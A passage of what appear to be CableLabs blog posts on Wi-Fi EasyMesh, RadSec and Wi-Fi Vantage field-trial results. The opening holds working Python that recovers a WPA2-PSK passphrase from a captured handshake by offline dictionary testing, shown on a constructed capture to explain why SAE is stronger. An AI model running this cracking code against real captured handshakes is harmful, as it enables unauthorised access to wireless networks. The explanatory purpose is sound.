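    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8 + SNONCE
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def capture_handshake(passphrase):
    """Stand-in for a sniffer capture: returns (message 2 with MIC zeroed, the MIC it carried)."""
    frame = message2_frame()
    kck = wpa2_kck(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return frame, eapol_mic(kck, frame)


def offline_dictionary_attack(frame, mic, wordlist):
    """Test candidates against the captured MIC; no frame is ever sent to the AP."""
    for candidate in wordlist:
        kck = wpa2_kck(wpa2_pmk(candidate, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, frame), mic):
            return candidate
    return None


if __name__ == "__main__":
    frame, mic = capture_handshake("correct horse")  # constructed weak backhaul passphrase
    print(offline_dictionary_attack(frame, mic, ["password", "letmein", "correct horse"]))
```

Every iteration runs without any traffic to the access point, which is why a weak WPA2-PSK backhaul passphrase can be recovered at leisure from a single capture. With SAE the commit/confirm exchange is a password-authenticated key exchange: a passive capture gives nothing to test guesses against, and an active attacker gets one guess per exchange with a live peer, which the AP can rate-limit.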
CableLabs’ Early and Continuing Involvement
Wi-Fi connectivity is key for CableLabs’ members, and CableLabs has been working closely on this Wi-Fi Alliance standard from the start. We were chosen to be the editor of the organization's test plan for both the first and second versions of the protocol, and we worked with Wi-Fi Alliance staff and vendors to develop the certification program. CableLabs continues to help lead and contribute essential technology to the Wi-Fi EasyMesh program.
Stay tuned for more press releases and blog posts to follow the progress of this new wireless technology.
RadSec, Securing RADIUS Message Exchange
With the ever-increasing use of mobile devices for data-rich activities, mobile networks have felt the burden of handling larger amounts of data. To gain relief, mobile operators have turned to offloading data onto Wi-Fi networks that are locally available—not only their own networks but Wi-Fi networks owned by their roaming partners. If the roaming partner’s Wi-Fi network is secured, then the subscriber’s credentials are exchanged between the roaming partner and the home operator, typically over the Internet. These credentials need to be secured while traversing the Internet, and the most common method is to use IPSec secure tunnels. Although IPSec secures and encrypts this critical information over the Internet, IPSec is not without issues and risks.
One issue is that the information is encrypted only from firewall to firewall, leaving the data unencrypted within both operator networks. In addition, setting up IPSec can be cumbersome because of the amount of work typically involved and the number of people involved, which can include the server administrator, network administrator, firewall administrator and security staff. There’s also the issue of performing key exchanges and testing the connections; the entire process is repeated if either end of the connection needs to be altered, resulting in downtime.
A Solution to These Issues Is RADIUS Security (RadSec)
Although RadSec is still a draft specification within the IEEE (RadSec profile for RADIUS), it’s based on RFC 6614, “Transport Layer Security (TLS) Encryption for RADIUS,” which enables the securing and encrypting of RADIUS messages between the RADIUS client and server. RadSec ensures that all RADIUS messages are secured and encrypted not only when they’re sent over the Internet but also when they’re deeper within each operator’s network, starting at the client and the server themselves. Because RadSec is based on TLS, the client and server are mutually authenticated at connection time, ensuring a trusted connection by chaining each certificate to a trusted Root Certificate. Because certificates are used, certificate revocation can be used to cut off unauthorized connections. In addition, TLS offers encryption of the RADIUS exchange. Encrypting the exchange prevents the exposure of sensitive subscriber information at all points between client and server—within the roaming partner’s network, over the Internet and within the mobile operator’s network—making the entire path secure.
RadSec is flexible and scalable. With RadSec, the client or server IP addresses can be altered without having to reconfigure secure tunnel settings, as would be required with IPSec. The number of peering clients and servers can also be increased as needed based on operational requirements—without requiring additional work to establish new secure tunnels. This flexibility contributes to RadSec’s scalability. With traditional secure tunnels, if additional roaming partnerships are formed, firewalls need to be configured to support the new tunnels. With RadSec, at most, firewall access control lists (ACLs) would need to be updated to allow traffic to and from the new partner; the same certificate can be used for all roaming partnership connections.
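The following is an added example, written for this post rather than taken from CableLabs, the WBA or any RADIUS vendor, that shows the RadSec building blocks described above in runnable Python: a mutually authenticated TLS context for each side (trust chain to a root, client certificate required, optional CRL checking), plus the RADIUS packet handling that RFC 6614 specifies on top of the TLS stream. Under RadSec the RADIUS-level shared secret is the fixed string “radsec”, because confidentiality and peer authentication come from TLS, and packets are delimited on the stream by each packet’s own Length field. The certificate file paths are placeholders, and the user name in the sample packet is constructed for the example.

```python
"""RadSec (RFC 6614) building blocks: mutually authenticated TLS contexts and
RADIUS packet framing / integrity over the TLS byte stream.  Example code, not a
vendor implementation."""
import hashlib
import hmac
import os
import ssl
import struct

RADSEC_PORT = 2083           # radsec/tcp, assigned by RFC 6614
RADSEC_SECRET = b"radsec"    # RFC 6614: fixed RADIUS secret; TLS provides the real protection

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_MESSAGE_AUTHENTICATOR = 80
HEADER_LEN = 20              # Code(1) Identifier(1) Length(2) Authenticator(16)
MAX_RADIUS_LEN = 4096


def make_radsec_client_context(cafile, certfile, keyfile, crl_check=True):
    """TLS context for a RadSec client (e.g. the roaming partner's proxy).

    Verifies the server's chain up to the trusted root in `cafile`, presents our
    own certificate so the server can authenticate us (mutual TLS) and, if asked,
    rejects a server whose certificate appears on a CRL loaded with the CA."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.load_cert_chain(certfile, keyfile)   # placeholder paths, supplied by the operator
    if crl_check:
        ctx.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
    return ctx


def make_radsec_server_context(cafile, certfile, keyfile, crl_check=True):
    """TLS context for a RadSec server (e.g. the home operator's RADIUS server).

    CERT_REQUIRED makes the handshake fail unless the client presents a
    certificate chaining to `cafile`; revoked client certificates are refused
    when a CRL is loaded and crl_check is on."""
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.load_cert_chain(certfile, keyfile)
    if crl_check:
        ctx.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
    return ctx


def build_access_request(identifier, user_name, secret=RADSEC_SECRET):
    """Encode an Access-Request carrying User-Name and a Message-Authenticator.

    The Message-Authenticator is HMAC-MD5 (RFC 2869) over the whole packet with
    its own value zeroed; under RadSec the key is the fixed secret "radsec"."""
    request_authenticator = os.urandom(16)
    attrs = bytes([ATTR_USER_NAME, 2 + len(user_name)]) + user_name
    attrs += bytes([ATTR_MESSAGE_AUTHENTICATOR, 18]) + bytes(16)   # zeroed placeholder
    length = HEADER_LEN + len(attrs)
    packet = struct.pack("!BBH", ACCESS_REQUEST, identifier, length)
    packet += request_authenticator + attrs
    mac = hmac.new(secret, packet, hashlib.md5).digest()
    return packet[:-16] + mac        # placeholder is the final 16 bytes


def verify_message_authenticator(packet, secret=RADSEC_SECRET):
    """Walk the attribute list and check the Message-Authenticator; False if
    it is absent, malformed or does not match."""
    pos = HEADER_LEN
    while pos + 2 <= len(packet):
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2 or pos + attr_len > len(packet):
            return False
        if attr_type == ATTR_MESSAGE_AUTHENTICATOR and attr_len == 18:
            zeroed = packet[:pos + 2] + bytes(16) + packet[pos + 18:]
            expected = hmac.new(secret, zeroed, hashlib.md5).digest()
            return hmac.compare_digest(expected, packet[pos + 2:pos + 18])
        pos += attr_len
    return False


def split_radius_stream(buf):
    """Split bytes read from the TLS connection into complete RADIUS packets
    using each packet's Length field.  Returns (packets, leftover_bytes)."""
    packets = []
    while len(buf) >= 4:
        (length,) = struct.unpack("!H", buf[2:4])
        if length < HEADER_LEN or length > MAX_RADIUS_LEN:
            raise ValueError("invalid RADIUS length %d on stream" % length)
        if len(buf) < length:
            break                     # wait for the rest of this packet
        packets.append(buf[:length])
        buf = buf[length:]
    return packets, buf


if __name__ == "__main__":
    req = build_access_request(7, b"alice@example.org")   # constructed sample
    print("Access-Request bytes:", len(req), "valid MA:", verify_message_authenticator(req))
    pkts, rest = split_radius_stream(req + req[:10])
    print("framed packets:", len(pkts), "bytes left over:", len(rest))
```

The server context is where the operator's trust policy lives: with `CERT_REQUIRED` and CRL checking, a partner whose certificate has been revoked cannot complete the handshake, which is the revocation-based cutoff the text describes, and no per-partner tunnel or key exchange is needed when a new partner is onboarded.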
Based on the benefits of RadSec, CableLabs has led the work in Wireless Broadband Alliance (WBA) to introduce RadSec to the WBA Wireless Roaming intermediary eXchange (WRiX).
For more information about RadSec, please contact Luther Smith (firstname.lastname@example.org).
Field Trial Results Show Wi-Fi CERTIFIED Vantage™ Devices Offer Significant Improvement to Network Performance
In high-traffic, high-volume user environments such as subways, airports, and stadiums, maintaining a reliable connection and moving consistently across access points (APs) in a Wi-Fi network has always been a challenge for users and operators. A solution to this issue is now commercially available in the form of Wi-Fi CERTIFIED Optimized Connectivity™ and Wi‑Fi CERTIFIED Agile Multiband™ AP and client devices. These are core certifications of the WFA Wi-Fi CERTIFIED Vantage™ program. These Wi-Fi Vantage™ devices contain features that optimize management and control frame transmissions, network discovery, authentication, and network transition. A field trial was conducted to measure the performance of a Wi‑Fi network using Wi-Fi Optimized Connectivity™ and Wi‑Fi Agile Multiband™ devices embedded in a highly congested urban environment centered around a busy subway station. Results show the following improvements over non-Wi-Fi Vantage devices:
Optimized Network Discovery
Without Wi-Fi Vantage, the inefficiencies of network discovery and response messages can severely disrupt existing client connections and make it difficult for clients to attach to the network. The optimized network discovery features in Wi-Fi Vantage include suppression and broadcast of probe responses by the AP, and probe request deferral and suppression by the client. Field trial results show that the number of probe responses in a Vantage network was reduced by 76% on the 2.4 GHz radios and by 72% on the 5 GHz radios. This resulted in a probe response airtime usage reduction of 67% in 2.4 GHz and 44% in 5 GHz.
Without Wi-Fi Vantage, clients can experience long reconnection setup times when moving back into a previously joined network. With Wi-Fi Vantage, this reconnection setup time is reduced using Fast Initial Link Setup (FILS) Authentication. When FILS Authentication was tested in the Wi-Fi Vantage network, results showed that the connection setup times decreased by 76% (from 228 ms to 55 ms).
Fast Network Transition
Without Fast Network Transition (FT), clients must perform a full Extensible Authentication Protocol (EAP) authentication when roaming, possibly interrupting the end-user experience. With Wi-Fi Vantage, once a client device decides to roam to a different AP, band, or channel, the association and connection happen quickly and seamlessly. Test results show that FT roaming improved client reconnection setup times by 84%, reducing them from 203 ms to 31 ms. In addition, Fast Network Transition can be deployed with, and will work alongside, FILS Authentication to further optimize client connections and roams.
A full-featured Wi-Fi Vantage network will benefit overall network performance and user experience, especially in high-traffic, high-volume environments. Some Vantage features may already be included in operator-managed Wi-Fi networks using vendor-specific implementation and nomenclature. Field trial results will allow operators to assess the value of a partial- or full-featured Vantage certified Wi-Fi network. CableLabs’ joint leadership with the operator community (cable and mobile operators) created the vision and roadmap for the Wi-Fi Vantage program while partnering with the Wi-Fi ecosystem and will continue these efforts for the next generation of Wi-Fi Vantage.